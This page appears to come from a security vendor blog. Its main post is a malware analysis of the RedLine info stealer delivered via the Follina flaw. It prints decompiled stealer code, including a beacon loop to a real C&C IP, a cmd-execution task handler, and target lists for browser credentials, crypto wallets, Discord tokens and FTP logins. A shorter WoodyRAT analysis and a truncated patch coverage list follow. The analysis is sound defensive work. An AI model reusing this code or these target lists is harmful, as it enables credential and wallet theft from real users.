Posts

Follina Vulnerability is being used to deliver Redline info stealer

Introduction

Malware authors are extensively using C# code to build malware since last few years, due to its simplicity and rich Application Programming Interfaces (API). RedLine is a C# written advanced info stealer active in the wild since 2020, it is available Malware-as-a-Service (Maas) on underground forum to subscribe or one time purchase. RedLine was initially spreading by sharing Unified Resource Locator (URL) in emails to be downloaded. But the method needed human intervention to execute the downloaded payload. Recently, the RedLine has started using Follina exploit targeting the CVE-2022-30190 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability, the method triggers the in-memory execution of the malware instead of saving on the disk. RedLine code is visibly simple with vast functionalities. Delivery and execution mechanism involves additional layers to prevent detection and analysis of the malware. The RedLine steals installed browsers data, digital wallets, FTP data, VPN data, Telegram files, Discord tokens, geographical data and captures screen.

 

Protection Layers

Protection layers are used recursively to bring and execute next level binary until gets the final payload, to prevent the detection and static analysis of the main payload.

Layer 1

The first binary contains encrypted resource entry named as “Helper_Classes”. RC2 decryption is used with key as ‘0989B3A46874B279F1BF795ED112CE22’ (MD5 from a string), mode as Electronic Code Book (ECB) and padding as PKCS7 to get next layer binary. Second layer binary is loaded and executed using reflection APIs.

 

Layer 2

The second binary contains Advanced Encryption Standard (AES) encrypted resource entry named as “Tesla”. AES algorithm is used with key ‘AB6EDF45E299A7B2968A9D7CD013C1164EFC6165508D691F085B7D9462EE945B’ (SHA256 from a string) and mode as ECB to get next layer binary. Export function from the third binary is invoked using reflection APIs by passing current executable path and payload binary bytes. The malware makes the persistence entry by copying itself into ‘%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\.exe’ using the PowerShell command (cmdlet).

Layer 3

This third binary is obfuscated variant of RunPE module available on GitHub by author NYAN CAT. The module accepts two arguments the executable file path and payload bytes. A new process is created for the provided file path and does process hollowing to execute the RedLine payload bytes.

 

RedLine Execution

The execution of RedLine info stealer starts from the main method that creates object of EntryPoint class which invokes the constructor, to initialize the Command and Control (C&C) IP addresses list, release identifier, message for the victim and key to decrypt. For the variant, key is kept empty as the fields including the C&C IP addresses list are not encrypted. The constructor also invokes unmanaged code APIs to hide the process console.

public EntryPoint()
{
NativeHelper.Hide();
IP = "45.155.165.19:24150";
ID = "rule";
Message = "";
Key = "";
}

After the initialization, Execute method is invoked which controls the complete execution flow starting from establishing connection with the C&C server using Simple Object Access Protocol (SOAP) API over Hypertext Transfer Protocol Secure (HTTPS) protocol. The malware tries to connect one of the IP addresses from the list of C&C IP addresses, separated by “|”, at the interval of 5 seconds until the connection is established.

bool flag = false;
while (!flag)
{
string[] array = StringDecrypt.Decrypt(entry.IP, entry.Key).Split(new string[1] { "|" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string address in array)
{
if (endpointConnection.RequestConnection(address) && endpointConnection.TryGetConnection())
{
flag = true;
break;
}
}
Thread.Sleep(5000);
}

 

Object of ScanningArgs class is instantiated which contains configuration information including flags to control various actions on the victim’s machine, list for scanning directory paths and attributes to terminate malware execution.

public class ScanningArgs
{
public bool ScanBrowsers { get; set; }
public bool ScanFiles { get; set; }
public bool ScanFTP { get; set; }
public bool ScanWallets { get; set; }
public bool ScanScreen { get; set; }
public bool ScanTelegram { get; set; }
public bool ScanVPN { get; set; }
public bool ScanSteam { get; set; }
public bool ScanDiscord { get; set; }
public List<string> ScanFilesPaths { get; set; }
public List<string> BlockedCountry { get; set; }
public List<string> BlockedIP { get; set; }
public List<string> ScanChromeBrowsersPaths { get; set; }
public List<string> ScanGeckoBrowsersPaths { get; set; }
}

 

A new object of ScanningArgs is received from the C&C server to update the default configuration object.

while (!endpointConnection.TryGetArgs(out args))
{
if (!endpointConnection.TryGetConnection())
{
throw new Exception();
}
Thread.Sleep(1000);
}

 

The BlockedContry list and BlockedIP list is empty for the variant. ScanFilesPaths contains list of files information to be collected from the victim’s machine, ScanChromeBrowsersPaths contains paths of user data storage directory for Chromium based browsers and ScanGeckoBrowsersPaths contains paths user data storage directory for Gecko based browsers:

Two structures are used by the malware to store the stolen information from the compromised machine. ScanResult is the main structure which stores the basic information and references to another structure ScanDetails (object is referred as structure) which stores the advance information.

public struct ScanResult
{
public string Hardware { get; set; }
public string ReleaseID { get; set; }
public string MachineName { get; set; }
public string OSVersion { get; set; }
public string Language { get; set; }
public string Resolution { get; set; }
public ScanDetails ScanDetails { get; set; }
public string Country { get; set; }
public string City { get; set; }
public string TimeZone { get; set; }
public string IPv4 { get; set; }
public byte[] Monitor { get; set; }
public string ZipCode { get; set; }
public string FileLocation { get; set; }
public bool SeenBefore { get; set; }
}

 

ScanResult.ScanDetails = new ScanDetails
{
AvailableLanguages = new List<string>(),
Browsers = new List<ScannedBrowser>(),
FtpConnections = new List<Account>(),
GameChatFiles = new List<ScannedFile>(),
GameLauncherFiles = new List<ScannedFile>(),
InstalledBrowsers = new List<BrowserVersion>(),
MessageClientFiles = new List<ScannedFile>(),
NordAccounts = new List<Account>(),
Open = new List<ScannedFile>(),
Processes = new List<string>(),
Proton = new List<ScannedFile>(),
ScannedFiles = new List<ScannedFile>(),
ScannedWallets = new List<ScannedFile>(),
SecurityUtils = new List<string>(),
Softwares = new List<string>(),
SystemHardwares = new List<SystemHardware>()
};

 

The malware retrieves the geographical information using one of the below URLs and initializes fields IPv4, City, Country and ZipCode into ScanResult structure.

  • ‘https://api.ip.sb/geoip’
  • ‘https://ipinfo.io/ip’
  • ‘https://api.ipify.org’

 

The malware terminates its execution, if the county or IP address of the compromised machine belongs to its lists of blocked countries or IPs respectively.

public static void AKSFD8H23(ScanningArgs settings, ref ScanResult result)
{
GeoInfo geoInfo = GeoHelper.Get();
geoInfo.IP = (string.IsNullOrWhiteSpace(geoInfo.IP) ? "UNKNOWN" : geoInfo.IP);
geoInfo.Location = (string.IsNullOrWhiteSpace(geoInfo.Location) ? "UNKNOWN" : geoInfo.Location);
geoInfo.Country = (string.IsNullOrWhiteSpace(geoInfo.Country) ? "UNKNOWN" : geoInfo.Country);
geoInfo.PostalCode = (string.IsNullOrWhiteSpace(geoInfo.PostalCode) ? "UNKNOWN" : geoInfo.PostalCode);
List<string> blockedCountry = settings.BlockedCountry;
if (blockedCountry != null && blockedCountry.Count > 0 && settings.BlockedCountry.Contains(geoInfo.Country))
{
Environment.Exit(0);
}
List<string> blockedIP = settings.BlockedIP;
if (blockedIP != null && blockedIP.Count > 0 && settings.BlockedIP.Contains(geoInfo.IP))
{
Environment.Exit(0);
}
result.IPv4 = geoInfo.IP;
result.City = geoInfo.Location;
result.Country = geoInfo.Country;
result.ZipCode = geoInfo.PostalCode;
}

 

The malware contains 22 action methods to collect data and perform tasks on compromised machine. The methods are invoked dynamically and randomly, and some of them perform action based on the flag values from the object of ScanningArgs class.

Actions = new ParsingStep[22] {
asdkadu8, sdfo8n234, sdfi35sdf, sdf934asd, asdk9345asd, a03md9ajsd, asdk8jasd, лыв7рыва2, ылв92р34выа, аловй, ыал8р45, ываш9р34, длвап9345, ывал8н34, вал93тфыв, вашу0л34, навева, ащы9р34, ыва83о4тфыв, askd435, sdi845sa, asd44123
};
Random rnd = new Random();
Actions = Actions.OrderBy((ParsingStep x) => rnd.Next()).ToArray();
Actions = new ParsingStep[22] {
asdkadu8, sdfo8n234, sdfi35sdf, sdf934asd, asdk9345asd, a03md9ajsd, asdk8jasd, лыв7рыва2, ылв92р34выа, аловй, ыал8р45, ываш9р34, длвап9345, ывал8н34, вал93тфыв, вашу0л34, навева, ащы9р34, ыва83о4тфыв, askd435, sdi845sa, asd44123
};
foreach (ParsingStep parsingStep in actions)
{
try
{
parsingStep(settings, ref result);
}
catch
{}
}

 

Action Methods

Action methods are used to fill the ScanResult and ScanDetails structures with the stolen data from the compromised machine.

 

  1. asdkadu8 (HardwareID)

Retrieves and concatenates domain name, username and serial number from the compromised machine to compute the MD5 hash. The MD5 hash is assigned to the Hardware field into ScanResult structure. This Hardware field can be used by the threat actors to identify the compromised machine.

ScanResult.Hardware = CryptoHelper.GetMd5Hash(Environment.UserDomainName + Environment.UserName + SystemInfoHelper.GetSerialNumber()).Replace("-", string.Empty);

 

  1. sdfo8n234 (ExecutableLocation)

File path of the running executable is assigned to FileLocation field into ScanResult structure.

ScanResult.FileLocation = Assembly.GetExecutingAssembly().Location;

 

  1. sdfi35sdf (OSInfo)

Retrieves input language, Time Zone and Operating System (OS) version from the compromised machine, and assigns respectively into Language, TimeZone and OSVersion fields into ScanResult structure.

ScanResult.Language = InputLanguage.CurrentInputLanguage.Culture.EnglishName;
ScanResult.TimeZone = TimeZoneInfo.Local.DisplayName;
ScanResult.OSVersion = SystemInfoHelper.GetWindowsVersion();

 

  1. sdf934asd (UserName)

Username of the compromised machine is assigned to MachineName field into ScanResult structure.

ScanResult.MachineName = Environment.UserName;

 

  1. asdk9345asd (ProcessorInfo)

Windows Management Instrumentation (WMI) query ‘SELECT * FROM Win32_Processor’ is executed to retrieve the processor information. Processor name, number of cores and processor type is assigned to Name, Counter and HardType fields respectively and added to SystemHardwares list into ScanDetails structure.

ScanResult .ScanDetails.SystemHardwares
{
Name = (managementObject["Name"] as string),
Counter = Convert.ToString(managementObject["NumberOfCores"]),
HardType = HardwareType.Processor
}

 

  1. a03md9ajsd (GraphicInfo)

WMI query ‘SELECT * FROM Win32_VideoController’ is executed to retrieve the graphics information. Name, AdapterRAM and Graphic type is assigned to Name, Counter and HardType fields respectively and added to SystemHardwares list into ScanDetails structure.

 

ScanResult.ScanDetails.SystemHardwares
{
Name = (managementObject["Name"] as string),
Counter = Convert.ToUInt32(managementObject["AdapterRAM"]).ToString(),
HardType = HardwareType.Graphic
}

 

  1. asdk8jasd (BrowsersInfo)

Installed browser information is retrieved using registry entry ‘HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\StartMenuInternet’ for 64bit machine and ‘HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet’ for 32bit machine. Name of the subkey, file path value of subkey ‘shell\open\command’ and version information from file path is assigned to NameOfBrowser, PathOfFile and Version respectively and added to InstalledBrowsers list into ScanResult structure.

 

ScanResult.ScanDetails.InstalledBrowsers
{
NameOfBrowser          :           registry subkey name
PathOfFile                  :           subkey value for ‘shell\open\command’
Version                     :           version information from the browser’s executable
}

 

  1. лыв7рыва2 (RAM size)

WMI query ‘SELECT TotalVisibleMemorySize FROM Win32_OperatingSystem’ is used to retrieve Random Access Memory (RAM) of the compromised machine. ‘Total of RAM’, ‘Graphic’ and RAM size is assigned to Name, HardType and Counter respectively and added to SystemHardwares list into ScanDetails structure.

 

ScanResult.ScanDetails.SystemHardwares
{
Name: “Total of RAM”
HardType = HardwareType.Graphic
Counter = SystemInfoHelper.TotalOfRAM()
}

 

  1. ылв92р34выа (SoftwaresInfo)

Installed software information is retrieved using registry entry ‘HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall’. Display name and version info is used to prepare and add value <DisplayName> [<DisplayVersion>] to Softwares list into ScanDetails structure.

 

ScanResult.ScanDetails.Softwares = SystemInfoHelper.ListOfPrograms();

 

  1. аловй (SecurityProductsInfo)

WMI queries for the namespace ‘ROOT\\SecurityCenter2’ or ‘ROOT\\SecurityCenter’ are used to retrieve the installed security products information.

  • SELECT * FROM AntivirusProduct
  • SELECT * FROM AntiSpyWareProduct
  • SELECT * FROM FirewallProduct

 

DisplayName is added to SecurityUtils list into ScanDetails structure.

 

  1. ыал8р45 (ProcessesInfo)

WMI query ‘SELECT * FROM Win32_Process Where SessionId=’Process.GetCurrentProcess().SessionId’’ is used to retrieve processes information. ProcessId, Name and CommandLine is concatenated to ‘ID: <ProcessId>, Name: <Name>, CommandLine: <CommandLine>’ and added to Processes list into ScanDetails structure.

 

ScanResult.ScanDetails.Processes = SystemInfoHelper.ListOfProcesses();

 

  1. ываш9р34 (InstalledLanguagesInfo)

Installed input languages is added to AvailableLanguages list into ScanDetails structure.

 

ScanResult.ScanDetails.AvailableLanguages = SystemInfoHelper.AvailableLanguages();

 

  1. длвап9345 (ScreenCapture)

If the ScanScreen flag is enabled, the screen is captured as a PNG image which is converted into bytes array and stored to Monitor field into ScanResult structure. The screen capture image can be used by threat actor to Identify, if the malware is running under any monitoring tool in a controlled environment.

 

  1. ывал8н34 (TelegramFiles)

If the ScanTelegram flag is enabled, processes are enumerated to find the ‘Telegram.exe’. If Telegram process is found, Telegram installation directory is extracted from executable’s path, else the default path ‘%APPDATA%\Telegram Desktop’ is considered as Telegram installation directory. The malware looks for 16 characters long subdirectories into the Telegram installation directory and adds them into the list of FileScannerArg along with path of ‘<Telegram Installation Directory>\tdata’.

FileScannerArg
{
Directory         :           “One of the scan directories”
Pattern            :           “*”
Recourisive     :           false
Tag                :           “sequence number”
}

 

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, user profile name, application name, file name and file path and adds to the list of MessageClientFiles in ScanDetails structure.

ScannedFile
{
Body                :           content of the file
DirfOfFile          :           profile directory name
NameOfApplication   :           application name or the directory sequence
NameOfFile          :           file name
PathOfFile          :           null
}

 

  1. вал93тфыв (BrowsersData)

If the ScanBrowsers flag is enabled, directory paths from ScanningArgs.ScanChromeBrowsersPaths and ScanningArgs.ScanGeckoBrowsersPaths are retrieved and enumerated to gets user data storing files. The user data files are decrypted to retrieve and save user data into ScannedBrowser structures and added to the Browsers list into ScanDetails structure.

ScannedBrowser
{
Autofills          :           auto fill entries list
BrowserName :           browser name
BrowserProfile :           browser profile
CC                 :           list of cards (HolderName, Month, Number, Year)
Cookies           :           list of ScannedCookies (Expires, Host, Http, Name, Path, Secure, Value)
Logins             :           list of Accounts (Password, URL, Username)
}

 

  1. вашу0л34 (SensitiveFiles)

If ScanFiles flag is enabled, file paths from ScanFilesPaths list from ScanningArgs are retrieved to get attributes directory to search, patterns, recursive search and maximum file size (optional) separated by “|”.

ScanningArgs.ScanFilesPaths
{
"%userprofile%\\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0" string
"%userprofile%\\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0"            string
}

Directory Patterns Recursive
%userprofile%\Desktop *.txt,*.doc*,*key*,*wallet*,*seed* 0
%userprofile%\Documents *.txt,*.doc*,*key*,*wallet*,*seed* 0

 

If the directory is “%DSK_32%”, the malware scans though all the logical drives recursively excluding file paths containing below sub paths. Default max file size of scanning any file is 3097152 bytes:

  • ‘\\Windows\\’
  • ‘\\Program Files\\’
  • ‘\\Program Files (x86)\\’
  • ‘\\Program Data\\’

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, file directory, application name, file name and file and adds to the list of ScannedFiles in ScanDetails structure

ScannedFile
{
Body                :           content of the file
DirfOfFile          :           file directory
NameOfApplication   :           null
NameOfFile          :           file name
PathOfFile          :           file path
}

 

  1. Навева (FileZillaCredentials)

If the ScanFTP flag is enabled, FileZilla files “%APPDATA%\FileZilla\recentservers.xml” and “%APPDATA%\FileZilla\sitemanager.xml” are examined to retrieve URL, port, username and password, and assigned to Account structure and added to FtpConnections into ScanDetails structure.

Account
{
URL            : FTP URL along with the port number
Username       : username
Password       : password
}

 

  1. ащы9р34 (DigitalWallets)

If the ScanWallets is enabled, digital currency wallets path including chromium-based browsers extension paths are added into FileScannerArg along with Patterns and Recoursive flag values.

browserExtensionsRule.SetPaths(settings.ScanChromeBrowsersPaths);
result.ScanDetails.ScannedWallets.AddRange(FileScanner.Scan(
new ArmoryRule(),
new AtomicRule(),
new CoinomiRule(),
new ElectrumRule(),
new EthRule(),
new ExodusRule(),
new GuardaRule(),
new Jx(),
new AllWalletsRule(),
browserExtensionsRule));

 

Directory Pattern Recursive Tag
%APPDATA%\Armory *.wallet false null
%APPDATA%\atomic * true null
%APPDATA%\Coinomi * true null
%APPDATA%\Ethereum\wallets * false null
%APPDATA%\Exodus *.json false null
%APPDATA%\Exodus\exodus.wallet * false null
%APPDATA%\Guarda * true null
%APPDATA%\com.liberty.jaxx * true null

 

Directory Pattern Recursive Tag
<ChromiumBrowsersDataDir>\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb * false <browser_name>_YoroiWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec * false <browser_name>_Tronlink
<ChromiumBrowsersDataDir>\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid * false <browser_name>_NiftyWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn * false <browser_name>_Metamask
<ChromiumBrowsersDataDir>\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc * false <browser_name>_MathWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad * false <browser_name>_Coinbase
<ChromiumBrowsersDataDir>\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp * false <browser_name>_BinanceChain
<ChromiumBrowsersDataDir>\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl * false <browser_name>_BraveWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln * false <browser_name>_GuardaWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac * false <browser_name>_EqualWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne * false <browser_name>_JaxxxLiberty
<ChromiumBrowsersDataDir>\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi * false <browser_name>_BitAppWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj * false <browser_name>_iWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih * false <browser_name>_Wombat
<ChromiumBrowsersDataDir>\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh * false <browser_name>_AtomicWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm * false <browser_name>_MewCx
<ChromiumBrowsersDataDir>\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj * false <browser_name>_GuildWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig * false <browser_name>_SaturnWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec * false <browser_name>_RoninWallet

 

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, file directory, application name, file name and file path and adds to the list of ScannedFiles into ScanDetails structure.

 

  1. ыва83о4тфыв (DiscordToken)

If the ScanDiscord flag is enabled, directory ‘%appdata%\discord\Local Storage\leveldb’ with Pattern *.log, *.ldb and Recoursive flag as false is added into FileScannerArg.

 

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, file directory, application name, file name and file path, and adds to the list of GameChatFiles in ScanDetails. The file body is again scanned to match regular expression ‘ [A-Za-z\d]{24}\.[\w-]{6}\.[\w-]{27} to retrieve the discord token which is then replaced the file body to the ScannedFile structure.

ScannedFile
{
Body                            :           matching regular expression pattern in file content
DirfOfFile                    :           file directory
NameOfApplication   :           null
NameOfFile                 :           Tokens.txt
PathOfFile                   :           file path
}

 

  1. askd435

If the ScanSteam flag is enabled, the Steam installation path is retrieved from the registry entry ‘HKEY_CURRENT_USER\SOFTWARE\Valve\Steam’ and added into FileScannerArg along with Pattern and Recousive flag.

Directory Patterns Recursive
<SteamInstalltionPath> *ssfn* 0
<SteamInstalltionPath>\config *.vsdf 0

 

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, file directory, application name, file name and file path and adds to the list of GameLauncherFiles into ScanDetails structure.

 

  1. sdi845sa (VPNFiles)

If ScanVPN flag is enabled, directory path for OpenVPN and ProtonVPN are added into FileScannerArg. The malware has artifacts that shows, NordVPN files stealing is either being used in other variant or it is planned to be used in upcoming variant.

 

Directory Patterns Recursive
%USERPROFILE%\AppData\Roaming\OpenVPN Connect\profiles *ovpn* 0
%USERPROFILE%\\AppData\\Local\\ProtonVPN *.vsdf 0

 

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, file directory, application name, file name and file path for OpenVPN and ProtonVPN and adds to the list Open and Proton into ScanDetails structure.

ScannedFile
{
Body                            :           file content
DirfOfFile                    :           null
NameOfApplication   :           null
NameOfFile                 :           name of file
PathOfFile                   :           file path
}

 

  1. asd44123

Primary screen size (width, height) is retrieved and assigned to Resolution field into ScanResult structure.

 

If the directory ‘%APPDATA%\Yandex\YaAddon’ exists on the compromised machine, it is considered that the malware already run before on the machine and SeenBefore field is set into ScanResult structure. If the directory is not found, SeenBefore field is reset and the directory ‘%APPDATA%\Yandex\YaAddon’ is created.

ScanResult.SeenBefore = SeenBefore();

 

The malware enumerates through the filled structures and replaces empty values with ‘UNKNOWN’.

 

String Obfuscation

Strings are broken into substring and characters to prevent string-based detections and static analysis. The malware also puts some garbage characters into the original string, which are replaced before using the string.

geoInfo.IP = Encoding.UTF8.GetString(new WebClient().DownloadData(new string(new char[21] {
'h', 't', 't', 'p', 's', ':', '/', '/', 'a', 'p',
'i', '.', 'i', 'p', 'i', 'f', 'y', '.', 'o', 'r',
'g'
}))).Replace("\n", "");

 

C&C Communication

RedLine sends the structure containing stolen data from the compromised machine using SOAP API and receives list of tasks containing TaskID, TaskArg, Action and DomainFilter from the C&C server.

 

public class UpdateTask
{
public int TaskID { get; set; }
public string TaskArg { get; set; }
public UpdateAction Action { get; set; }
public string DomainFilter { get; set; }
}

 

The malware has 5 action tasks but for the variant, RunPE task action is not supported.

public enum UpdateAction
{
Download,
RunPE,
DownloadAndEx,
OpenLink,
Cmd
}

Actions Commands

Cmd

Executes the TaskArg value using Command Prompt executable
System.Diagnostics.Process.Start(new ProcessStartInfo("cmd", "/C "+updateTask.TaskArg)
{
UseShellExecu[t]e = false,
CreateNoWindow = true
}).WaitForExit(30000);

Download

Retrieves download URL and file path from the TaskArg field, separated by “|”. File is downloaded from the URL and saved to the file path.

 

DownloadAndEx

Retrieves download URL and file path from the TaskArg field, separated by “|”. File is downloaded from the URL and executes by setting the current working directory to the downloaded file directory.

 

OpenLink

TaskArg is executed as a new process.

 

The malware sends the TaskID from UpdateTask to the C&C server after completing the action task on the compromised machine.

 

Indicators Of Compromise

Follina

20aa70539f31bd9cafba21a89b06857298f64f2cca97869e7cf6532927016877

 

Protection Layers

3354174f028a2682fa83d1b8bce2cf90fa39534f108f9902c2d5ecd644ad8421 (Layer 1)

846e9ae1f5cb837efc5a96ebfff3b846fa48433d19426b869c2bfbe80c90479a (Layer 2)

97024f17003dd3d31dab64c4d1b8251e50d428644eb59ed3692ad79ce42019cf (Layer 3, RunPE)

 

RedLine

4799408b9b05bdf02da7807a3e3e253f35fb2e57cc55e28cb8fe3b181825bb29

 

C&C Server

45.155.165.19:24150

 

References

https://www.proofpoint.com/us/blog/threat-insight/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign

https://github.com/NYAN-x-CAT/CSharp-RunPE

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

 

New WoodyRAT Malware Found in the Wild

A new type of remote access trojan (RAT) has been identified by several AV companies. Dubbed ‘WoodyRAT’ due to the debugging information string, it is a multi-featured payload with a list of capabilities. As with many attacks, Woody has been found attached to Word documents, namely Russian documents titled “Information security memo”[1] in phishing emails. Using CVE-2022-30190 (Folina vulnerability), the executable is dropped to the system and launched.

The main file observed is 687kb in size and named “WindowsInternalApp.exe”. It has no packer, protector, or encryption.

There are several items noted during analysis of the file. First, it has a non-standard section (_RDATA) listed.

Second, the language listed for the file is in Russian; were the file legitimate, it would be English. There is also a lack of trademark icons, but the average user would probably not notice this.

The third item is that there are two embedded executables in the .data section. This is very irregular and warrants investigation.

Looking through the strings of the file, there are very clear items that the malware is looking for. Antivirus programs, python and PowerShell versions, directory information, users, environment (OS), network connectivity, and permissions are among the data collected to be sent to the C2 address, which is also found and listed as hxxp://Microsoft-telemetry.ru/knock. As of this writing, the domain is no longer active. Since the strings are all in cleartext, the commands are listed as follows:

URL Commands: /knock, /submit, /ping
C2 Commands: _ACK, _CRY, _DAT, DMON, DNLD, _DIR, EXEC, INFO, INJC, PING, PSLS, PURG, _REQ, UPEX, UPPR, SCRN, SDEL, _SET, STCK, UPDM, UPLD
.NET Commands: DN_B, DN_D, PSSC, PSSS, PSSM

WoodyRAT also has a variety of anti-debug and anti-analysis tools. It will search for all major debuggers and disassemblers to try to prevent runtime analysis, as well as multiple antivirus engines. The embedded .NET and PowerSession files allow for more granular control from the C2, command storage using Base64 strings, and AV bypass.

Files

  • WindowsInternalApp.exe
    • md5: 243d0a9c1519df83c2d9122cb884f8d8
    • sha1: b0799d496fe129e1b600e232897ee1d4796768e8
    • sha256: 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e
    • imphash: Unable to generate
  • DotNetExecutor.dll
    • md5: 06FA1178578E5D72A6596A2B6B0CB8F0
    • sha1: 5E66369BDDB1A29A3D0F84F3F111A9A4C9835D59
    • sha256: 090B6D6D7E4950EED17D589179D34B88358C34AF749824D8B9525FAB7A406AB1
    • imphash: 51C8A422DDBB923765C5E966868CD8DD
    • Compiler-Timestamp: 0xCF53B7C4 (Fri Mar 22 21:57:24 2080| UTC)
    • Debugger-Timestamp: 0xD200FB25 (Sun Aug 24 16:47:33 2081| UTC)
    • Reference: https://github.com/JerrettDavis/DotnetExecutor
  • PowerSession.dll
    • md5: 074666CD14549003CA9A0A3F2310FD26
    • sha1: BD2ACCF2CA4CDA0E330D87BFB3A64FB9684309D6
    • sha256: AFB190B89DD98FCA76B66F27A80551142A8B78BE9EFB14CC5D3D45C20D67D109
    • Imphash: FDBD1C9EE827DA590ABA590AA8E414D2
    • Compiler-Timestamp: 0xD064136C (Tue Oct 15 12:05:00 2080| UTC)
    • Debugger-Timestamp: 0xDF0FE3F6 (Tue Aug 03 08:36:06 2088| UTC)
    • Reference: https://github.com/Watfaq/PowerSession

URL

Microsoft-telemetry.ru

Strings

  • C:\Users\user\Desktop\woody_2\clone\SharpExec\DotNetExecutor\obj\Release\DotNetExecutor.pdb
  • C:\Users\user\Desktop\dev\sharp-memory\PowerSession\obj\Release\PowerSession.pdb
  • C:\Users\user\Desktop\woody_2\build\bin\WoodyNode.pdb

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: WoodyRAT.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for June 2022

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-30147 Windows Installer Elevation of Privilege Vulnerability
ASPY 331:Malformed-File dll.MP_8

CVE-2022-30160 Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability
ASPY 332:Malformed-File exe.MP_257

CVE-2022-30190 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability
IPS 2771: Microsoft Support Diagnostic Tool RCE (Follina)
IPS 2772: Microsoft Support Diagnostic Tool RCE (Follina)
IPS 2773: Microsoft Support Diagnostic Tool RCE (Follina)
IPS 2774: Microsoft Support Diagnostic Tool RCE (Follina)
GAV: CVE-2022-30190.X
GAV: CVE-2022-30190.X_1
GAV: CVE-2022-30190.X_2

The following vulnerabilities do not have exploits in the wild :
CVE-2022-21123 Intel: CVE-2022-21123 Shared Buffer Data Read (SBDR)
There are no known exploits in the wild.
CVE-2022-21125 Intel: CVE-2022-21125 Shared Buffers Data Sampling (SBDS)
There are no known exploits in the wild.
CVE-2022-21127 Intel: CVE-2022-21127 Special Register Buffer Data Sampling Update (SRBDS Update)
There are no known exploits in the wild.
CVE-2022-21166 Intel: CVE-2022-21166 Device Register Partial Write (DRPW)
There are no known exploits in the wild.
CVE-2022-22018 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22021 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29111 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29119 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29143 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29149 Azure Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30131 Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30132 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30135 Windows Media Center Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30136 Windows Network File System Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30137 Azure Service Fabric Container Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30139 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30140 Windows iSCSI Discovery Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30141 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30142 Windows File History Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30143 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30145 Windows Encrypting File System (EFS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30146 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
